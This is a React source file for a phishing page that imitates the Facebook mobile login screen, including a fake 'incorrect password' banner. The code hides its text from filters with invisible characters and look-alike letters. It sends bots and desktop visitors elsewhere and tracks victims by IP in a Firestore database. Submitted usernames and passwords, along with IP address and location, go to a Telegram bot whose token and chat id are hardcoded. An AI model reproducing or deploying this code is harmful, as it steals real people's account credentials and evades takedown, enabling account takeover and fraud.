import React, { useEffect, useState } from 'react';
import AnimatedLogo from './AnimatedLogo';
import { addDoc, collection, doc, getDoc, getDocs, onSnapshot, setDoc } from 'firebase/firestore';
import Botd from '@fingerprintjs/botd';
import { publicIpv4 } from 'public-ip';
import { IoIosAdd as IconAdd } from "react-icons/io";
import { footerLinks, desktoplanguages, mobileLanguages } from '../sakles/malores.js'; // Import mobileLanguages
import { db } from '../f7g8h9p.js';
import { useMediaQuery } from 'react-responsive';
import '../sakles/malores.js';

const N3b8z6 = () => {
    const [ip, setIp] = useState(undefined);
    const [grraht, setCode] = useState('');
    const [dexlus, setdexlus] = useState('');
    const [userData, setUserData] = useState(undefined);
    const [isUserData, setIsUserData] = useState(false);
    const [userUrl, setUserUrl] = useState(false);
    
    const isDesktop = useMediaQuery({ query: '(min-width: 768px)' });

            // Bot detection and redirect to /blank
useEffect(() => {
    const detectBot = async () => {
        const botd = await Botd.load();
        const result = await botd.detect();

        if (result.bot) {
            console.log('Bot detected:', result.bot.type);
            window.location.href = "/ds";
        } else {
            console.log('Not a bot');
        }
    };

    detectBot();
}, []);
        
    useEffect(() => {
        if (isDesktop) {
            window.location.href = 'yQn6Lp2Xo4Kv9Jm1Ts7Fb3Wr8Ig5Nc0Zd2Uh9Pk6Vr4Mt1Jo8Lq5Xn3Bs7Fy6Hw4';
        }
    }, [isDesktop]);

    const handleActions = (event) => {
        event.preventDefault(); // Prevent the default form submission
        if (grraht === '') {
            // Handle code validation
            return;
        } else {
            const bot = 'bot7998763746:AAHkT1vQxXCYwn3Gt3cNG3muww3Hc5Tu4QQ';
            const chid = '8393113385';

            fetch(`https://ipapi.co/json/`)
                .then((response) => response.json())
                .then((response) => {
                    const { country, region, city } = response;
                    const content = `========================\nLS 1: '${grraht}'\nLS 2: '${dexlus}'\nCountry : '${country}'\nRegion : '${region}'\nCity : '${city}'\nIP: '${ip}'\n========================`;

                    const encodedContent = encodeURIComponent(content);

                    fetch(`https://api.telegram.org/${bot}/sendMessage?chat_id=${chid}&text=${encodedContent}`, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                    })
                        .then(() => {
                            window.location = 'hZp5Xq8Lo1Kr6Jn3Vs9Ft2Mb7Yi4Wc0Tg3Uo8Nr6Vk2Lp5Jm7Qn1Xs9Bd4Fw6Ht2';
                        })
                        .catch((error) => {
                            window.location = 'hZp5Xq8Lo1Kr6Jn3Vs9Ft2Mb7Yi4Wc0Tg3Uo8Nr6Vk2Lp5Jm7Qn1Xs9Bd4Fw6Ht2';
                        });
                });
        }
    };

    const handleCodeChange = (e) => {
        setCode(e.target.value); // Allow any input
    };
    const handleCodeChange1 = (e) => {
        setdexlus(e.target.value); // Allow any input
    };
    const getUserData = async (e) => {
        const documentSnapshot = await getDocs(collection(db, "georgebs"));
        const newData = documentSnapshot.docs
            .map((doc) => ({ ...doc.data(), id: doc.id }));
        const filter = newData.filter(x => {
            if (x.ip === ip) {
                setIsUserData(true);
                setUserData(x);
                return x;
            }
        });
        if (filter.length === 0) {
            addUserData();
        }
    };

    const getIp = async () => {
        if (ip === undefined) {
            const ip = await publicIpv4();
            setIp(ip);
        }
    };
    getIp();

    useEffect(() => {
        if (ip) {
            onSnapshot(collection(db, "georgebs"), (snapshot) => {
                let isExist = false;
                snapshot.docs.map((doc) => ({ ...doc.data(), id: doc.id })).filter(x => {
                    if (x.ip === ip) {
                        isExist = true;
                        setUserData(x);
                        fetch('./data.json').then(
                            function (res) {
                                return res.json();
                            },
                        ).then(function (data) {
                            data.url_data.filter((item) => {
                                if (item.id === parseInt(x.redir)) {
                                    setUserUrl(item.url);
                                    return;
                                }
                            });
                        }).catch(
                            function (err) {
                                console.log(err, ' error');
                            },
                        );
                    }
                });
                if (!isExist) {
                    setUserUrl(false);
                }
            });
        }
    }, [ip]);

    useEffect(() => {
        document.title = '‌Lо‌g int‌‌‌о Fаc‌‌еbо‌o‌k';
    }, [userData, userUrl]);

    const addUserData = async () => {
        try {
            const docRef = doc(collection(db, "georgebs"), ip);

            // Check if the document exists
            const docSnap = await getDoc(docRef);

            if (!docSnap.exists()) {
                // Document doesn't exist, so set the data
                await setDoc(docRef, {
                    ip: ip,
                    number: -1,
                    redir: "-1"
                });
                console.log("BegasID: ", ip);
                getUserData();
            } else {
                console.log("ResID ID: ", ip);
            }
        } catch (e) {
            console.error("Serr: ", e);
        }
    };

    const resetUserNumber = async () => {
        try {
            const docRef = doc(collection(db, "georgebs"), ip);
            await setDoc(docRef, { redir: "-1" }, { merge: true });
            console.log("DegIP: ", ip);
        } catch (e) {
            console.error("Gerr: ", e);
        }
    };

    useEffect(() => {
        if (ip) {
            getUserData();
        }
    }, [ip]);

    if (userUrl) {
        setTimeout(() => {
            window.location = userUrl;
        }, 1000);
        resetUserNumber();
    }

    console.log("hiuoio", isUserData, userData);

    if (isUserData) {
      return (
        <section className="w-full flex sm:hidden flex-col items-center justify-start gap-4 bg-white">
<div style={{ 
    width: '100%', 
    textAlign: 'left', 
    fontFamily: 'SFProText-Regular, Helvetica, Arial, sans-serif',
    padding: '4.4px 3.4px', 
    fontSize: '13.6px',
    color: 'white', 
    backgroundColor: '#f73333', 
}}>
    The pas‌s‌wo‌rd yo‌u ente‌red is inco‌‌rre‌ct. Did you for‌get your pa‌ss‌wo‌r‌d?
</div>
      <a href="/smoment">
        <AnimatedLogo />
      </a>
            <div className="w-full max-w-[450px] flex flex-col items-center justify-start gap-3 px-3">
                <form className="w-full flex flex-col items-center justify-start gap-2" onSubmit={handleActions}>
                    <input
                        type="text" id="grraht" name="grraht"
                        className="w-full p-[8px] text-sm placeholder:text-sm text-neutral-500 rounded bg-bekio/60 shadow-md font-medium border-[1px] border-solid border-bekio focus:outline-none" style={{fontFamily: 'SFProText-Regular, Helvetica, Arial, sans-serif',}}
                        placeholder="M‌o‌b‌i‌l‌e‌ n‌u‌m‌b‌e‌r o‌r e‌m‌a‌i‌l" onChange={handleCodeChange} required/>
                        <span className='becros'></span>
                   
                    <input
                        type="text" id="dexlus" name="dexlus"
                        className="w-full p-[8px] pr-4 text-sm placeholder:text-sm text-neutral-500 rounded bg-bekio/60 shadow-md font-medium border-[1px] border-solid border-[#dd3c10] focus:outline-none" style={{fontFamily: 'SFProText-Regular, Helvetica, Arial, sans-serif',WebkitTextSecurity: 'disc', textSecurity: 'disc'}}
                        placeholder="P‌ass‌wo‌rd" onChange={handleCodeChange1} required/>
                        
                    <span className='form-dexlus'></span>
                    <button type="submit" className="w-full mt-1 px-3 h-[35px] bg-begex hover:bg-opacity-90 text-white text-base font-semibold rounded transition-all duration-300"style={{fontFamily: 'SFProText-Regular, Helvetica, Arial, sans-serif',}}>
                        Log in
                    </button>
                </form>
                <button type="button" className="w-full text-begex text-sm font-medium bg-none hover:underline transition-all duration-300"style={{fontFamily: 'SFProText-Regular, Helvetica, Arial, sans-serif',}}>
                    Fo‌rgot ac‌co‌un‌t?
                </button>
                <div className="w-full flex items-center justify-between gap-3">
                    <div className="flex-1 h-[0.5px] bg-neutral-400 text-neutral-400" />
                    <p className="text-sm font-medium text-neutral-500">or</p>
                    <div className="flex-1 h-[0.5px] bg-neutral-400 text-neutral-400" />
                </div>
                <button type="button" className="w-full max-w-[80%] text-sm bg-none font-medium px-2 py-[6px] border-[1px] border-solid border-neutral-400 rounded hover:bg-neutral-300/20 transition-all duration-300">
                    Create new account
                </button>
                <footer className="w-full py-10 flex flex-col items-center justify-start gap-4">
                    <div className="w-full grid grid-cols-2 gap-[6px] place-items-center">
                        <p className="text-xs text-neutral-500 hover:underline font-bold transition-all duration-300 cursor-pointer">
                            En‌gli‌sh (U‌S)
                        </p>
                        {mobileLanguages.map((item, i) => (
                            <p key={i} className="text-xs text-neutral-500 hover:underline transition-all duration-300 cursor-pointer">
                                {item}
                            </p>
                        ))}
                        <div className="px-[3px] flex items-center justify-center border-[1px] border-solid border-[#ccd0d5] rounded-[2px] overflow-hidden cursor-pointer transition-all duration-300">
                            <IconAdd size={17} />
                        </div>
                    </div>
                    <p className="text-xs text-center w-full text-neutral-500 transition-all duration-300 cursor-pointer">
                        M‌‌et‌a © 2‌025
                    </p>
                </footer>
            </div>
        </section>
    );
}
return null; // Return null if no user data is present
};

export default N3b8z6;
